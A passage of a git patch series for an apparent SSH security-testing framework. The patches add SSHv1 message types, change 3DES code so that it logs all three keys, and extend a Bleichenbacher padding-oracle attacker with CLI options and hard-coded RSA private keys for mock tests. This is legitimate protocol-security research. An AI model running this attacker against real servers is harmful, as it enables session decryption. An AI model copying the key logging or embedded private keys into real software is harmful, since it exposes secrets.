ArrayConverter.bytesToHexString(this.key3)); - } catch (InvalidKeyException - | InvalidAlgorithmParameterException - | IllegalBlockSizeException - | BadPaddingException e) { - throw new RuntimeException(e); - } + byte[] enc1 = encCipher1.update(plainData); + byte[] enc2 = encCipher2.update(enc1); + byte[] enc3 = encCipher3.update(enc2); + LOGGER.info("Resulting in encrypted ata: {}", ArrayConverter.bytesToHexString(enc3)); + return enc3; } @Override @@ -94,28 +107,21 @@ public byte[] decrypt(byte[] encryptedData) throws CryptoException { @Override public byte[] decrypt(byte[] encryptedData, byte[] iv) throws CryptoException { - IvParameterSpec decryptIv = new IvParameterSpec(iv); + // iv = new byte[8]; LOGGER.info( "Decrypting 3DES with data: {} with iv {}", ArrayConverter.bytesToHexString(encryptedData), - iv); - try { - cipher1.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.key3, "DES"), decryptIv); - cipher2.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(this.key2, "DES"), decryptIv); - cipher3.init(Cipher.DECRYPT_MODE, new SecretKeySpec(this.key1, "DES"), decryptIv); + ArrayConverter.bytesToHexString(iv)); - byte[] enc1 = cipher1.doFinal(encryptedData); - byte[] enc2 = cipher2.doFinal(enc1); - byte[] enc3 = cipher3.doFinal(enc2); - LOGGER.info("Resulting in decrypted data: {}", ArrayConverter.bytesToHexString(enc3)); - return enc3; + LOGGER.debug("Decryption with key {}", ArrayConverter.bytesToHexString(this.key1)); + LOGGER.debug("Decryption with key {}", ArrayConverter.bytesToHexString(this.key2)); + LOGGER.debug("Decryption with key {}", ArrayConverter.bytesToHexString(this.key3)); - } catch (InvalidKeyException - | InvalidAlgorithmParameterException - | IllegalBlockSizeException - | BadPaddingException e) { - throw new RuntimeException(e); - } + byte[] enc1 = decCipher1.update(encryptedData); + byte[] enc2 = decCipher2.update(enc1); + byte[] enc3 = decCipher3.update(enc2); + LOGGER.info("Resulting in decrypted data: {}", ArrayConverter.bytesToHexString(enc3)); + return enc3; } @Override From 021c94ee9e386895af8d009973ad142483b1075c Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 30 Dec 2023 23:39:06 +0100 Subject: [PATCH 124/176] Adding more packet-types from OpenSSH 7.1 --- .../core/constants/MessageIdConstantSSH1.java | 138 ++---------------- .../core/layer/impl/SSH1Layer.java | 4 + .../parser/BinaryPacketParserSSHv1.java | 1 + 3 files changed, 14 insertions(+), 129 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java index 3de80a491..51460639b 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/MessageIdConstantSSH1.java @@ -51,135 +51,15 @@ public enum MessageIdConstantSSH1 { SSH_CMSG_X11_REQUEST_FORWARDING((byte) 34), SSH_CMSG_AUTH_RHOSTS_RSA((byte) 35), SSH_MSG_DEBUG((byte) 36), - SSH_CMSG_REQUEST_COMPRESSION((byte) 37); - - /* - * Sources: - * - https://www.iana.org/assignments/ssh-parameters/ssh-parameters.xhtml#ssh-parameters-1 - */ - // [ RFC 4253 ] - /*VERSION_EXCHANGE_MESSAGE((byte) 200), - ASCII_MESSAGE((byte) 201), - SSH_MSG_DISCONNECT((byte) 1), - SSH_MSG_IGNORE((byte) 2), - SSH_MSG_UNIMPLEMENTED((byte) 3), - SSH_MSG_DEBUG((byte) 4), - SSH_MSG_SERVICE_REQUEST((byte) 5), - SSH_MSG_SERVICE_ACCEPT((byte) 6), - // [ RFC 8308 ] - SSH_MSG_EXT_INFO((byte) 7), - SSH_MSG_NEWCOMPRESS((byte) 8), - // 9 - 19 unassigned (transport layer generic) - SSH_MSG_KEXINIT((byte) 20), - SSH_MSG_NEWKEYS((byte) 21), - // 22 - 29 unassigned (algorithm negotiation) - // 30 - 49 reserved (key exchange method specific) - // [ RFC 4419 ] - SSH_MSG_KEX_DH_GEX_REQUEST_OLD((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_REQUEST((byte) 34, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_GROUP((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_INIT((byte) 32, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_REPLY((byte) 33, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - // [ RFC 4253 ] - SSH_MSG_KEXDH_INIT((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN), - SSH_MSG_KEXDH_REPLY((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN), - // [ https://datatracker.ietf.org/doc/html/draft-kampanakis-curdle-pq-ssh-00 ] - SSH_MSG_HBR_INIT((byte) 30, KeyExchangeFlowType.HYBRID), - SSH_MSG_HBR_REPLY((byte) 31, KeyExchangeFlowType.HYBRID), - // [ RFC 5656 ] - SSH_MSG_KEX_ECDH_INIT((byte) 30, KeyExchangeFlowType.ECDH), - SSH_MSG_KEX_ECDH_REPLY((byte) 31, KeyExchangeFlowType.ECDH), - SSH_MSG_ECMQV_INIT((byte) 30, KeyExchangeFlowType.ECMQV), - SSH_MSG_ECMQV_REPLY((byte) 31, KeyExchangeFlowType.ECMQV), - // [ RFC 4432 ] - SSH_MSG_KEXRSA_PUBKEY((byte) 30, KeyExchangeFlowType.RSA), - SSH_MSG_KEXRSA_SECRET((byte) 31, KeyExchangeFlowType.RSA), - SSH_MSG_KEXRSA_DONE((byte) 32, KeyExchangeFlowType.RSA), - // [ RFC 4462 ] - // TODO: Add specificTo on GSS messages - SSH_MSG_KEXGSS_INIT((byte) 30), - SSH_MSG_KEXGSS_CONTINUE((byte) 31), - SSH_MSG_KEXGSS_COMPLETE((byte) 32), - SSH_MSG_KEXGSS_HOSTKEY((byte) 33), - SSH_MSG_KEXGSS_ERROR((byte) 34), - SSH_MSG_KEXGSS_GROUPREQ((byte) 40), - SSH_MSG_KEXGSS_GROUP((byte) 41), - // [ RFC 4252 ] - SSH_MSG_USERAUTH_REQUEST((byte) 50), - SSH_MSG_USERAUTH_FAILURE((byte) 51), - SSH_MSG_USERAUTH_SUCCESS((byte) 52), - SSH_MSG_USERAUTH_BANNER((byte) 53), - // 54 - 59 unassigned (user authentication generic) - // 60 - 79 reserved (user authentication method specific) - // [ RFC 4252 ] - SSH_MSG_USERAUTH_PK_OK((byte) 60, AuthenticationMethod.PUBLICKEY), - SSH_MSG_USERAUTH_PASSWD_CHANGEREQ((byte) 60, AuthenticationMethod.PASSWORD), - // [ RFC 4256 ] - SSH_MSG_USERAUTH_INFO_REQUEST((byte) 60, AuthenticationMethod.KEYBOARD_INTERACTIVE), - SSH_MSG_USERAUTH_INFO_RESPONSE((byte) 61, AuthenticationMethod.KEYBOARD_INTERACTIVE), - // [ RFC 4462 ] - SSH_MSG_USERAUTH_GSSAPI_RESPONSE( - (byte) 60, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_TOKEN( - (byte) 61, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE( - (byte) 63, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_ERROR( - (byte) 64, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_ERRTOK( - (byte) 65, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_MIC( - (byte) 66, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - // [ RFC 4254 ] - SSH_MSG_GLOBAL_REQUEST((byte) 80), - SSH_MSG_REQUEST_SUCCESS((byte) 81), - SSH_MSG_REQUEST_FAILURE((byte) 82), - // 83 - 89 unassigned (connection protocol generic) - SSH_MSG_CHANNEL_OPEN((byte) 90), - SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 91), - SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 92), - SSH_MSG_CHANNEL_WINDOW_ADJUST((byte) 93), - SSH_MSG_CHANNEL_DATA((byte) 94), - SSH_MSG_CHANNEL_EXTENDED_DATA((byte) 95), - SSH_MSG_CHANNEL_EOF((byte) 96), - SSH_MSG_CHANNEL_CLOSE((byte) 97), - SSH_MSG_CHANNEL_REQUEST((byte) 98), - SSH_MSG_CHANNEL_SUCCESS((byte) 99), - SSH_MSG_CHANNEL_FAILURE((byte) 100), - // 101 - 127 unassigned (channel related messages) - // 128 - 191 reserved (for client protocols) - // 192 - 255 reserved for private use (local extensions) - UNKNOWN((byte) 255);*/ + SSH_CMSG_REQUEST_COMPRESSION((byte) 37), + SSH_CMSG_MAX_PACKET_SIZE((byte) 38), + SSH_CMSG_AUTH_TIS((byte) 39), + SSH_SMSG_AUTH_TIS_CHALLENGE((byte) 40), + SSH_CMSG_AUTH_TIS_RESPONSE((byte) 41), + SSH_CMSG_AUTH_KERBEROS((byte) 42), + SSH_SMSG_AUTH_KERBEROS_RESPONSE((byte) 43), + SSH_CMSG_HAVE_KERBEROS_TGT((byte) 44), + SSH_CMSG_HAVE_AFS_TOKEN((byte) 65); private final byte id; private final Enum[] specificTo; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 212208c78..610103708 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -286,6 +286,10 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { LOGGER.debug("[bro] returning SSH_MSG_CHANNEL_CLOSE Hint"); break; // return new PacketLayerHint(ProtocolMessageType.SSH_MSG_CHANNEL_CLOSE); + case SSH_CMSG_AUTH_TIS: + LOGGER.debug("[bro] returning SSH_CMSG_AUTH_TIS Hint"); + readSuccessMessage((BinaryPacket) packet); + break; case SSH_SMSG_SUCCESS: LOGGER.debug("[bro] returning SSH_SMSG_SUCCESS Hint"); readSuccessMessage((BinaryPacket) packet); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java index f6dca6d21..67d0e2b99 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParserSSHv1.java @@ -221,6 +221,7 @@ private void parseSSHv1Packet(BinaryPacketSSHv1 binaryPacket) throws CryptoExcep LOGGER.debug("LENGHT = {}", binaryPacket.getLength()); int padding_lenght = 8 - (binaryPacket.getLength().getValue() % 8); + LOGGER.debug("PADDING LENGHT = {}", padding_lenght); binaryPacket.setCiphertext( parseByteArrayField(binaryPacket.getLength().getValue() + padding_lenght)); From a41bcd31021a2b7f852155b221568ecc8c9d77cc Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Tue, 2 Jan 2024 14:57:43 +0100 Subject: [PATCH 125/176] Adding CLI-Parameters for Attacker to choose mock-key-lenght and oracle-type --- .../config/BleichenbacherCommandConfig.java | 46 ++ .../attacks/impl/BleichenbacherAttacker.java | 471 ++++++++++-------- .../attacks/pkcs1/Bleichenbacher.java | 308 +++++++----- .../sshattacker/attacks/pkcs1/KeyLenght.java | 14 + .../sshattacker/attacks/pkcs1/OracleType.java | 24 + .../attacks/pkcs1/oracles/Ssh1MockOracle.java | 15 +- 6 files changed, 524 insertions(+), 354 deletions(-) create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/KeyLenght.java create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/OracleType.java diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java index 645b3b6b6..c7dbab340 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java @@ -10,6 +10,8 @@ import com.beust.jcommander.Parameter; import com.beust.jcommander.ParametersDelegate; import de.rub.nds.sshattacker.attacks.config.delegate.AttackDelegate; +import de.rub.nds.sshattacker.attacks.pkcs1.KeyLenght; +import de.rub.nds.sshattacker.attacks.pkcs1.OracleType; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.config.delegate.ClientDelegate; import de.rub.nds.sshattacker.core.config.delegate.GeneralDelegate; @@ -47,6 +49,34 @@ public class BleichenbacherCommandConfig extends AttackConfig { "If this value is set the Attack is Benchmarked, all Encrypted-Secrets are randomly generated") private boolean benchmark = false; + @Parameter( + names = {"-classic"}, + required = false, + description = + "If this value is set the Attack is run in 'classic' mode, so no algorithm_improvements are used") + private boolean classic = false; + + @Parameter( + names = {"-keyLenght", "-k"}, + required = false, + description = + "Sets the oracle type for the attack, if real, the connection will be queried, otherwise it will be handeled as mock oracle. In case of the mock oracle, short means 1024 and 768 bit keys, long means 2048 and 1024 bit keys") + private KeyLenght keyLenght = KeyLenght.REAL; + + @Parameter( + names = {"-oracleType", "-o"}, + required = false, + description = + "Sets the oracle type for the attack, if real, the connection will be queried, otherwise it will be handeled as mock oracle") + private OracleType oracleType = OracleType.REAL; + + @Parameter( + names = {"-sendSinglePacket", "-s"}, + required = false, + description = + "If set, the string after this parameter will be send as packet directly to the oracle") + private String sendSinglePacket = ""; + /** How many rescans should be done */ private int numberOfIterations = 3; @@ -109,4 +139,20 @@ public String getCookie() { public void setCookie(String cookie) { this.cookie = cookie; } + + public KeyLenght getKeyLenght() { + return keyLenght; + } + + public OracleType getOracleType() { + return oracleType; + } + + public String getSendSinglePacket() { + return sendSinglePacket; + } + + public boolean isClassic() { + return classic; + } } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index 131771d85..0111caba8 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -15,6 +15,8 @@ import de.rub.nds.sshattacker.attacks.general.KeyFetcher; import de.rub.nds.sshattacker.attacks.general.ParallelExecutor; import de.rub.nds.sshattacker.attacks.pkcs1.*; +import de.rub.nds.sshattacker.attacks.pkcs1.oracles.BleichenbacherOracle; +import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Pkcs1Oracle; import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Ssh1MockOracle; import de.rub.nds.sshattacker.attacks.response.EqualityError; import de.rub.nds.sshattacker.core.config.Config; @@ -38,7 +40,6 @@ import java.security.InvalidKeyException; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; -import java.security.interfaces.RSAPublicKey; import java.util.ArrayList; import java.util.Arrays; import java.util.List; @@ -64,6 +65,197 @@ public class BleichenbacherAttacker extends Attacker publicKeys = new ArrayList<>(); private CustomRsaPublicKey serverPublicKey, hostPublicKey; + // -- Testing key for MOCK-Tests -- + + private KeyLenght keyLenght; + private OracleType oracleType; + + private CustomRsaPrivateKey serverPrivateKey, hostPrivatKey; + + // Host 2048 + CustomRsaPrivateKey hostPrivatKey2048 = + new CustomRsaPrivateKey( + new BigInteger( + "7AAB5898AEE7C451A2A90B9DE04EC947656FAB69460FF68E1E278EA1841D" + + "A22B39CA4A4FA7CEA1B8EDCB7224C38A1659D1226D2E07AF9A7C62A305AC" + + "9DEC042FBC290443B23E24C64765DE1AD58777A522BF102B1BCC5536D794" + + "62BCBE6DB8E91CD9CF6F98F62E5031BFAA9E51C93ED900579A39C26CBB64" + + "CF7E6F998513E20B4B2A4DD36D4F6F074A0FDB04232FA6EDAB89A1B32BA5" + + "2214696BDA66C4518A73F92807DD088AB11263519885A0CD6A42B6D9EAE9" + + "EBD13241EDC4EB7205AE838A5EF7AE280D36410057B38ED05CEBA75F92AC" + + "DF40226164BB3A0C4312B65A8C2FBA85CDB7CC5F77F53C45F64409AFC460" + + "210C8EE4DAB818F009172387ED00E141", + 16), + new BigInteger( + "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" + + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" + + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" + + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" + + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" + + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" + + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" + + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" + + "3F3EE64B04888B898864B08200A9E22909", + 16)); + CustomRsaPublicKey hostPublicKey2048 = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00D9F6BFFAB8BC79C6E9AB6C3D4593F561CC93B41A70B9A750045ED0AC09" + + "6EF4A6A8C7B2AAA4F44459481319AE956934BF9D5C5AD7C004ADE0B81E43" + + "75FD1DF8797DF6F3CA130ED8A2A9B6E94467A05D97A0F8380A4CBB75FC5E" + + "5C303433B61750063D3801D5C90658ACAEE140B09F95A0FD8886EFAE16EA" + + "B779DF82E6A12C1BE011FECB417C788B72C42948AB54CCE1E8119CFB78E1" + + "3B06090CEBF6D3806854FE09F03B20BA92505058EC64C44F0B4DA0BAE71D" + + "52EDA11AB67F4B54D9FCEFE1FACEB520D595FFA33502FB91423EBD972F26" + + "150715CB0E648F715E6E5E8FC9D8FA55E9DE0652CF85D7928B235486F54A" + + "3F3EE64B04888B898864B08200A9E22909", + 16)); + // Server 1024 + CustomRsaPrivateKey serverPrivateKey1024 = + new CustomRsaPrivateKey( + new BigInteger( + "64F3D28624C63EC5E0A9751FDC4B2D" + + "ADC715F0DDA9D49EF91B4C5AA03483" + + "570BA8AA01151B704335A3219E7D22" + + "2FDB9777DA68F8DF8B5CDB5DB9B0C3" + + "99CF0334044E6ED09B40E754809429" + + "F6C387B7AC7BA00ECFE7AFE4D41499" + + "B2F341FBB0496C52CBE5EB1F7E64F4" + + "BF21F72B64EE0B478EAB6A0008E07A" + + "E2F52960703D0EB9", + 16), + new BigInteger( + "00C25E6978A2B8FE2C6228024BD5D0" + + "F3239DDDDECCDF156AEF9D3F7F56AF" + + "8443C510A03C66779363C33082D04D" + + "23648B308AE0BE07A1451C8BFF0B97" + + "DCA43E5703D66B8C04BF46DDBC79A7" + + "7228179E5B246433098BF8271CCE66" + + "C5E4CB3A9E2ECEE52BB07C33F92893" + + "A5D5B6F163BE6FBC1E8E66E4666866" + + "871890105EFFE1193F", + 16)); + CustomRsaPublicKey serverPublicKey1024 = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00C25E6978A2B8FE2C6228024BD5D0" + + "F3239DDDDECCDF156AEF9D3F7F56AF" + + "8443C510A03C66779363C33082D04D" + + "23648B308AE0BE07A1451C8BFF0B97" + + "DCA43E5703D66B8C04BF46DDBC79A7" + + "7228179E5B246433098BF8271CCE66" + + "C5E4CB3A9E2ECEE52BB07C33F92893" + + "A5D5B6F163BE6FBC1E8E66E4666866" + + "871890105EFFE1193F", + 16)); + + // Host 1024 + CustomRsaPublicKey hostPublicKey1024 = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00C6D5D18B3BDCA91AE922941730D7" + + "BFF6F959CACC67609C571CA281148B" + + "97F8CA742B85E9FABAF308E6BFED40" + + "06B639159E19CCCD3FFF4374E905B3" + + "D4FEE6B3F8867940FDAD622FF59E7E" + + "8E7801C29D5BEB6004E1F127C1B37B" + + "5BEDFF057F06FB133A21DA77B2B9FA" + + "9E4CF72740F0049B30DC1CE23EB2B7" + + "E6E92B129E1EFE67E3", + 16)); + CustomRsaPrivateKey hostPrivatKey1024 = + new CustomRsaPrivateKey( + new BigInteger( + "0092FAA9AC0FB31CBA0CCE07C460D1" + + "8B5088A02C7E0E88E6E8A9FD2207CA" + + "ECAAF7150ABB31EBAAD84EA32C0AB7" + + "C27E5F1230CD878BCD9BE7047BE040" + + "3FD9B13624D9C822AB17C96615BB5A" + + "875D1A076D282B2E9035FAC37DB066" + + "82C8498BA624C77B0E1E2ECBE7AB5A" + + "5A0342E20C54482D149A7F37F8EF4A" + + "2C148CD3ADD6782189", + 16), + new BigInteger( + "00C6D5D18B3BDCA91AE922941730D7" + + "BFF6F959CACC67609C571CA281148B" + + "97F8CA742B85E9FABAF308E6BFED40" + + "06B639159E19CCCD3FFF4374E905B3" + + "D4FEE6B3F8867940FDAD622FF59E7E" + + "8E7801C29D5BEB6004E1F127C1B37B" + + "5BEDFF057F06FB133A21DA77B2B9FA" + + "9E4CF72740F0049B30DC1CE23EB2B7" + + "E6E92B129E1EFE67E3", + 16)); + // Server 768 Bit + CustomRsaPublicKey serverPublicKey768 = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "00CB2C65943BB603C0072D4C5AFD8B" + + "C5155D57231F02D191A079A3758BCF" + + "96E83318F0729D05437B543088D8A1" + + "73675EE40E7506EFB09EDD62C868C5" + + "27DB0768AB643AD09A7C42C6AD47DA" + + "ACE6CD53C051E26E69AF472D0CFE17" + + "322EC96499E529", + 16)); + CustomRsaPrivateKey serverPrivateKey768 = + new CustomRsaPrivateKey( + new BigInteger( + "00B30F82CADCC13296E7FC5D420819" + + "49EDE560A99C68208906F48D4248A1" + + "00EFCE30D9A1398FED04619390D7D3" + + "9AE0ECB7DFB6A5EC8CA6A491097680" + + "9280CB64AF1F8C8B67739CF7093B34" + + "4343419647B331CD9827953279BE6C" + + "AC31C55BA6EF01", + 16), + new BigInteger( + "00CB2C65943BB603C0072D4C5AFD8B" + + "C5155D57231F02D191A079A3758BCF" + + "96E83318F0729D05437B543088D8A1" + + "73675EE40E7506EFB09EDD62C868C5" + + "27DB0768AB643AD09A7C42C6AD47DA" + + "ACE6CD53C051E26E69AF472D0CFE17" + + "322EC96499E529", + 16)); + + // Test + // Host 2048 + CustomRsaPrivateKey hostPrivatKeyCustom = + new CustomRsaPrivateKey( + new BigInteger( + "36BDABD4DC5CE64FAF60420BE9DB5D534CB1A5D7E4BE3BC455B71907EE5C9B69F6DCA7D326DFFD352E11BE3A02BFF5F801F97C54A813D373EE23D86374C4D5F010C2A964FF2945B3D988B1337B713F5831DA28C30D3A5986DAF6E7F7E4F4775957A3CBFBAEAE84E3A0A2AFE1D59C293903D2B39852C82AEB7B23ED0704D1FE69", + 16), + new BigInteger( + "AB81705A90C69618E388795B521C2353E7E0B37B133D7780593C068C3E39D5D57CD67F07E3D76B3EF8213E2494732579223644A88CE48E5A3D6EEF208B20CEA5F50A99D42B0A915C765654175D35C9BC4DBC4432B499D890ED79315BAB7B3485595154A87F2F040B8ACC654A93A9C51F418163BDB3A2D57A092F7FBC10B4BF1D", + 16)); + CustomRsaPublicKey hostPublicKeyCustom = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "AB81705A90C69618E388795B521C2353E7E0B37B133D7780593C068C3E39D5D57CD67F07E3D76B3EF8213E2494732579223644A88CE48E5A3D6EEF208B20CEA5F50A99D42B0A915C765654175D35C9BC4DBC4432B499D890ED79315BAB7B3485595154A87F2F040B8ACC654A93A9C51F418163BDB3A2D57A092F7FBC10B4BF1D", + 16)); + // Server 1024 + CustomRsaPrivateKey serverPrivateKeyCustom = + new CustomRsaPrivateKey( + new BigInteger( + "ABE6304FAE535001BBFA94474FA4178C012058518A93805A25EFD56932C365724B422CDE3EE038243367AE3C57876CE297E66531B2F027B1407DE77758200761FFE5F96360BE21DDB7ECAD61523319A8DAA65B5F00CF52F0DB2F3A2A929EDA11", + 16), + new BigInteger( + "CC8E8480EB2E26580EA260146575CB10D215F71A46BBB62C98D854154579E372E193102FF359799C4D247A661F32C082EE5C1919B43889214C8310E6291E2B0B16818464BAE5A0374CACA0EB4814756B71C3E1F459AB4B8DE555D338CA30557F", + 16)); + CustomRsaPublicKey serverPublicKeyCustom = + new CustomRsaPublicKey( + new BigInteger("010001", 16), + new BigInteger( + "CC8E8480EB2E26580EA260146575CB10D215F71A46BBB62C98D854154579E372E193102FF359799C4D247A661F32C082EE5C1919B43889214C8310E6291E2B0B16818464BAE5A0374CACA0EB4814756B71C3E1F459AB4B8DE555D338CA30557F", + 16)); + // -- Testing key for MOCK-Tests -- private final int counterInnerBleichenbacher; private final int counterOuterBleichenbacher; @@ -118,7 +310,7 @@ public boolean hasOracle() { * * @return Transient public key */ - private RSAPublicKey getServerPublicKey() { + private void getServerPublicKey() { if (serverPublicKey == null) { if (publicKeys.isEmpty()) { getPublicKeys(); @@ -127,10 +319,9 @@ private RSAPublicKey getServerPublicKey() { serverPublicKey = publicKeys.get(0); } } - return serverPublicKey; } - private RSAPublicKey getHostPublicKey() { + private void getHostPublicKey() { if (hostPublicKey == null) { if (publicKeys.isEmpty()) { getPublicKeys(); @@ -139,7 +330,6 @@ private RSAPublicKey getHostPublicKey() { hostPublicKey = publicKeys.get(1); } } - return hostPublicKey; } private void getPublicKeys() { @@ -174,11 +364,13 @@ private String sendSinglePacket(byte[] msg) { @Override public void executeAttack() { - byte[] msg = new byte[100]; - msg = - ArrayConverter.hexStringToByteArray( - "12CE7501BDDC7AF798644ACB351A37A90F31FB0E0CF0D9C18BE14FAB0CF0F4F42689F13C06370A477E764E0CA64DEC2F7A12ABFFBDE3058901D9A3CC453B72C7BEB059BAF394F642A0EE5AE5D4AC6BA775C23E9ADBE5338E8896AB521525979C98AC993C5F5C8F1D35DEA7EBD22BB485E925B8E50C9258C00673B96733F29D16"); - // LOGGER.info(sendSinglePacket(msg)); + if (!config.getSendSinglePacket().isEmpty()) { + byte[] msg = ArrayConverter.hexStringToByteArray(config.getSendSinglePacket()); + LOGGER.info(sendSinglePacket(msg)); + } + + this.oracleType = config.getOracleType(); + this.keyLenght = config.getKeyLenght(); if (config.isBenchmark()) { try { @@ -194,198 +386,36 @@ public void executeAttack() { } } - // Test - // Host 2048 - /* CustomRsaPrivateKey hostPrivatKey = - new CustomRsaPrivateKey( - new BigInteger( - "36BDABD4DC5CE64FAF60420BE9DB5D534CB1A5D7E4BE3BC455B71907EE5C9B69F6DCA7D326DFFD352E11BE3A02BFF5F801F97C54A813D373EE23D86374C4D5F010C2A964FF2945B3D988B1337B713F5831DA28C30D3A5986DAF6E7F7E4F4775957A3CBFBAEAE84E3A0A2AFE1D59C293903D2B39852C82AEB7B23ED0704D1FE69", - 16), - new BigInteger( - "AB81705A90C69618E388795B521C2353E7E0B37B133D7780593C068C3E39D5D57CD67F07E3D76B3EF8213E2494732579223644A88CE48E5A3D6EEF208B20CEA5F50A99D42B0A915C765654175D35C9BC4DBC4432B499D890ED79315BAB7B3485595154A87F2F040B8ACC654A93A9C51F418163BDB3A2D57A092F7FBC10B4BF1D", - 16)); - CustomRsaPublicKey hostPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - "AB81705A90C69618E388795B521C2353E7E0B37B133D7780593C068C3E39D5D57CD67F07E3D76B3EF8213E2494732579223644A88CE48E5A3D6EEF208B20CEA5F50A99D42B0A915C765654175D35C9BC4DBC4432B499D890ED79315BAB7B3485595154A87F2F040B8ACC654A93A9C51F418163BDB3A2D57A092F7FBC10B4BF1D", - 16)); - // Server 1024 - CustomRsaPrivateKey serverPrivateKey = - new CustomRsaPrivateKey( - new BigInteger( - "ABE6304FAE535001BBFA94474FA4178C012058518A93805A25EFD56932C365724B422CDE3EE038243367AE3C57876CE297E66531B2F027B1407DE77758200761FFE5F96360BE21DDB7ECAD61523319A8DAA65B5F00CF52F0DB2F3A2A929EDA11", - 16), - new BigInteger( - "CC8E8480EB2E26580EA260146575CB10D215F71A46BBB62C98D854154579E372E193102FF359799C4D247A661F32C082EE5C1919B43889214C8310E6291E2B0B16818464BAE5A0374CACA0EB4814756B71C3E1F459AB4B8DE555D338CA30557F", - 16)); - CustomRsaPublicKey serverPublicKey = - new CustomRsaPublicKey( - new BigInteger("010001", 16), - new BigInteger( - 